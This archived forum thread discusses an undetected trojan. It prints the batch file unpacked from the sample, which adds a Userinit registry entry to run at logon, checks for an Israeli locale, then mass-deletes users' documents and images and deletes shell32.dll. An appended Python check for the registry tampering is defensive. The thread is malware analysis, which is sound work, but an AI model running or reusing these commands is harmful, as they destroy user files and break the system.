
View full version : New Trojan / Not detectable by any antivirus/rootkit/anti-spyware



adis
14.05.2008, 22:09
Hello everybody,

I have discovered by chance a few processes running from a TMP file/VBS script.

I copy and paste the VBS script. I do not know what this Trojan is doing, but when I deleted the files and rebooted, my keyboard and mouse didn't work! I have tried several antivirus, anti-rootkits and anti-spyware which didn't work.
moderated::: file attached as VBS.txt

Muffler
14.05.2008, 22:21
Hi,
adis, can you send us a copy of this file?

Looks like this is a part of Worm.Win32.AutoRun...

adis
15.05.2008, 00:13
I have put the vbs script and the explot.exe renamed to explot-root.exe here:

http://www.speedyshare.com/521433131.html

Muffler
15.05.2008, 08:00
Explot-root.exe - malware.
Packed with two packers: UPX and Morphine.
Unpacked file contains .bat file which I think explains everything:


@echo off
title

reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %systemroot%\system32\userinit.exe,%systemroot%\system32\taskfile.exe /f

reg query "HKCU\Keyboard Layout\Preload" >>"%systemdrive%\svi\003988274\svss.lpd"
reg query "HKCU\Control Panel\International" >>"%systemdrive%\svi\003988274\svss.lpd"
find /I "0000040d" "%systemdrive%\svi\003988274\svss.lpd"
if %errorlevel%==1 exit
find /I "Israel" "%systemdrive%\svi\003988274\svss.lpd"
if %errorlevel%==1 exit

del /f /s C:\*.jpg C:\*.txt C:\*.doc C:\*.htm
del /f /s d:\*.jpgd:\*.txt d:\*.doc C:\*.htm
del/f /s e:\*.jpg e:\*.txt e:\*.doc C:\*.htm
del /f /s f:\*.jpg f:\*.txt f:\*.doc C:\*.htm
del /f /s g:\*.jpg g:\*.txt g:\*.doc C:\*.htm
del /f /s h:\*.jpg h:\*.txt h:\*.doc C:\*.htm
del /f /s I:\*.jpg I:\*.txt I:\*.doc C:\*.htm
del /f /s J:\*.jpg J:\*.txt J:\*.doc C:\*.htm

del /f %systemroot%\system32\shell32.dll
del /f %systemdrive%\svi*...
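
A defender-side check for the Userinit change made by the batch file above, as an added example that is not part of the original thread: it parses the text printed by `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit` and lists every entry other than userinit.exe. The function names, the sample outputs and the default `C:\Windows` system root are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumption: a clean system stores "<SystemRoot>\system32\userinit.exe," here.
EXPECTED_SUFFIX = r"\system32\userinit.exe"

def parse_userinit(reg_output):
    """Return the Userinit data string from `reg query` text, or None."""
    pattern = re.compile(r"\s*Userinit\s+REG_(?:EXPAND_)?SZ\s+(.*\S)\s*$", re.I)
    for line in reg_output.splitlines():
        match = pattern.match(line)
        if match:
            return match.group(1)
    return None

def unexpected_entries(reg_output, systemroot=r"C:\Windows"):
    """List comma-separated Userinit entries that are not the stock userinit.exe."""
    data = parse_userinit(reg_output)
    if data is None:
        raise ValueError("Userinit value not found in reg query output")
    expected = ntpath.normcase(systemroot + EXPECTED_SUFFIX)
    extras = []
    for entry in data.split(","):
        entry = entry.strip().strip('"')
        if not entry:
            continue  # the stock value ends with a trailing comma
        # Resolve an unexpanded %systemroot% before comparing (lambda avoids
        # backslash-escape handling in the replacement string).
        resolved = re.sub(r"%systemroot%", lambda _: systemroot, entry, flags=re.I)
        if ntpath.normcase(ntpath.normpath(resolved)) != expected:
            extras.append(entry)
    return extras

# Constructed sample outputs (not captured from the infected machine).
KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
CLEAN = KEY + "\n    Userinit    REG_SZ    C:\\Windows\\system32\\userinit.exe,\n"
TAMPERED = (KEY + "\n    Userinit\tREG_SZ\t"
            "C:\\WINDOWS\\system32\\userinit.exe,C:\\WINDOWS\\system32\\taskfile.exe\n")

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, "->", unexpected_entries(sample) or "only userinit.exe")
```

Any entry the check reports is launched at every logon alongside userinit.exe, so it should be examined before the value is restored to the stock one.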

adis
15.05.2008, 09:34
Thanks! Any idea how to cure this?

It seems it was supposed to delete all my documents and pictures on the system. And, at the end, it was deleting itself and shell32? Do you think shell32 and tasklist are infected as well?

I have avast home edition running as antivirus on my system. It did not detect anything! Trying to cure with others didn't work either!

cheers
Adrian

Rene-gad
15.05.2008, 09:50
"Thanks! Any idea how to cure this?"
pls. read the rules http://virusinfo.info/showthread.php?t=9184 :rtfm: